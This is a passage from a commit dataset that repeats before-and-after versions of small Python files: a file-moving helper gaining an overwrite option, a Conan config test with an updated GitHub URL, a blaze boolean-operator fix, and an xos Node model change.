Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and not isfile(out_file):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file)))Add in overwrite output file | from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file, overwrite=False):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and (overwrite or not isfile(out_file)):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file))) | <commit_before>from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and not isfile(out_file):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file)))<commit_msg>Add in overwrite output file<commit_after> | from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file, overwrite=False):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and (overwrite or not isfile(out_file)):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file))) | from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and not isfile(out_file):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file)))Add in overwrite output filefrom os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file, overwrite=False):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and (overwrite or not isfile(out_file)):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file))) | <commit_before>from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and not isfile(out_file):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file)))<commit_msg>Add in overwrite output file<commit_after>from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file, overwrite=False):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and (overwrite or not isfile(out_file)):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file))) |
4d55b1bde81c9f426da97f474d759ba8b0a94650 | cpt/test/unit/config_test.py | cpt/test/unit/config_test.py | import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/conan-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
| import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/bincrafters-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
| Update Bincrafters config url for tests | Update Bincrafters config url for tests
Signed-off-by: Uilian Ries <d4bad57018205bdda203549c36d3feb0bfe416a7@gmail.com>
| Python | mit | conan-io/conan-package-tools | import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/conan-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
Update Bincrafters config url for tests
Signed-off-by: Uilian Ries <d4bad57018205bdda203549c36d3feb0bfe416a7@gmail.com> | import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/bincrafters-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
| <commit_before>import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/conan-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
<commit_msg>Update Bincrafters config url for tests
Signed-off-by: Uilian Ries <d4bad57018205bdda203549c36d3feb0bfe416a7@gmail.com><commit_after> | import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/bincrafters-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
| import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/conan-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
Update Bincrafters config url for tests
Signed-off-by: Uilian Ries <d4bad57018205bdda203549c36d3feb0bfe416a7@gmail.com>import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/bincrafters-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
| <commit_before>import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/conan-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
<commit_msg>Update Bincrafters config url for tests
Signed-off-by: Uilian Ries <d4bad57018205bdda203549c36d3feb0bfe416a7@gmail.com><commit_after>import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/bincrafters-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
|
f55f965c4102e2d7230ace39a0eecdaf585538ea | blaze/expr/scalar/boolean.py | blaze/expr/scalar/boolean.py | import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __not__(self):
return Not(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
| import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __invert__(self):
return Invert(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
symbol = '~'
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
| Use __invert__ instead of __not__ | Use __invert__ instead of __not__
| Python | bsd-3-clause | LiaoPan/blaze,caseyclements/blaze,cpcloud/blaze,cowlicks/blaze,caseyclements/blaze,jdmcbr/blaze,dwillmer/blaze,nkhuyu/blaze,scls19fr/blaze,mrocklin/blaze,cowlicks/blaze,dwillmer/blaze,cpcloud/blaze,xlhtc007/blaze,jcrist/blaze,maxalbert/blaze,jdmcbr/blaze,ChinaQuants/blaze,ContinuumIO/blaze,maxalbert/blaze,mrocklin/blaze,nkhuyu/blaze,jcrist/blaze,LiaoPan/blaze,xlhtc007/blaze,ChinaQuants/blaze,scls19fr/blaze,ContinuumIO/blaze,alexmojaki/blaze,alexmojaki/blaze | import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __not__(self):
return Not(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
Use __invert__ instead of __not__ | import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __invert__(self):
return Invert(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
symbol = '~'
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
| <commit_before>import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __not__(self):
return Not(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
<commit_msg>Use __invert__ instead of __not__<commit_after> | import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __invert__(self):
return Invert(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
symbol = '~'
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
| import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __not__(self):
return Not(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
Use __invert__ instead of __not__import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __invert__(self):
return Invert(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
symbol = '~'
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
| <commit_before>import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __not__(self):
return Not(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
<commit_msg>Use __invert__ instead of __not__<commit_after>import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __invert__(self):
return Invert(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
symbol = '~'
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
|
367d5d6196c3c21e2d1353b258801e6d5e14e602 | xos/core/models/node.py | xos/core/models/node.py | import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
| import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def __init__(self, *args, **kwargs):
super(Node, self).__init__(*args, **kwargs)
self.no_sync=True
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
| Make Node syncs a noop | Make Node syncs a noop
| Python | apache-2.0 | jermowery/xos,cboling/xos,cboling/xos,cboling/xos,jermowery/xos,cboling/xos,xmaruto/mcord,jermowery/xos,xmaruto/mcord,xmaruto/mcord,cboling/xos,jermowery/xos,xmaruto/mcord | import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
Make Node syncs a noop | import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def __init__(self, *args, **kwargs):
super(Node, self).__init__(*args, **kwargs)
self.no_sync=True
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
| <commit_before>import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
